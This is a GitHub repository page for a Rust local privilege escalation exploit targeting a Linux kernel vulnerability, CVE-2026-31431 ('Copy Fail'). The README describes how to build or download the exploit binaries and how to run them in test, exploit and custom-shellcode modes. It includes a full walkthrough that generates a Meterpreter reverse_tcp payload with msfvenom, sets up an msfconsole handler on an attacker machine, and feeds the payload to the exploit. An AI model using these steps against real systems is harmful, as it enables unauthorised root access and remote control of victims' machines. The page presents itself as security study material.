Skip to content

iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
src
src
 
 
.gitignore
.gitignore
 
 
Cargo.lock
Cargo.lock
 
 
Cargo.toml
Cargo.toml
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
build.sh
build.sh
 
 

Repository files navigation

CVE-2026-31431 - Linux Copy-Fail Exploit (Rust)

A Rust implementation of a local privilege escalation exploit for CVE-2026-31431 (Copy-Fail).

It allows executing customized shellcode (such as Meterpreter)

Introduction

Xint disclosed CVE-2026-31431, an arbitrary page cache write vulnerability that chains AF_ALG and splice() to achieve a 4-byte write primitive.

Source: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

Disclaimer

This project was developed as part of my personal interest in studying cybersecurity. However, it may potentially be misused for malicious purposes.

Please do NOT use this tool for any illegal activities.

The author is not responsible for any misuse of this software.

Acknowledgement

Note: The original work uses a compressed/encoded shellcode (e.g., /bin/sh). In this implementation, I replaced it with a raw (uncompressed) /bin/bash shellcode, making it easier to customize or directly replace with user-supplied payloads.

How to Compile

Clone the project, then execute build.sh:

git clone git@github.com:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

Usage

Download and extract the release package:

wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

The binaries provide the options below:

./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

Demonstration

Test Vulnerability

On the vulnerable machine:

./CVE-2026-31431-Linux-Copy-Fail --test

Exploitation

./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

Use the command (set PrependSetUid to True) below to generate Meterpreter payload:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

On the attacker machine (Kali Linux):

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

On the vulnerable machine:

./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

Affected Versions

About

Rust implementation Exploit/PoC of CVE-2026-31431-Linux-Copy-Fail, allow executing customized shellcode (such as Meterpreter).

iss4cf0ng.github.io/2026/04/30/2026-4-30-CVE-2026-31431/

Topics

linux rust proof-of-concept exploit poc vulnerability cve vulnerable privilege-escalation privilege-escalation-exploits explotation linux-vulnerability cve-2026-31431

Resources

Readme

License

MIT license
Activity

Stars

39 stars

Watchers

0 watching

Forks

12 forks
Report repository

Releases 1

CVE-2026-31431-Linux-Copy-Fail Latest
Apr 30, 2026

Packages

 
 
 

Contributors

Languages